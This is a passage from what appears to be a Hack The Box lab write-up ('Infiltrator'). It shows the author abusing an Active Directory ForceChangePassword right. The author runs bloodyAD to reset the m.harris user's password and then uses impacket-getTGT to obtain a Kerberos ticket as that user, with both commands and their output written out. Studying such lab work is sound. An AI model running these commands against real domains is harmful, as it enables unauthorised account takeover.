ForceChangePassword
During domain enumeration with BloodHound, it was identified that the chiefs marketing group has the ForceChangePassword privilege over the m.harris user
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=e.rodriguez@dc01.infiltrator.htb.ccache bloodyAD -v DEBUG -d INFILTRATOR.HTB -k --host dc01.infiltrator.htb set password m.harris 'Qwer1234'
[+] Password changed successfully!Now that I have added the e.rodriguez user to the chiefs marketing group, I can change the password of the m.harris user
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/m.harris@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: Qwer1234
[*] Saving ticket in m.harris@dc01.infiltrator.htb.ccacheSuccessfully validated
TGT generated for the m.harris user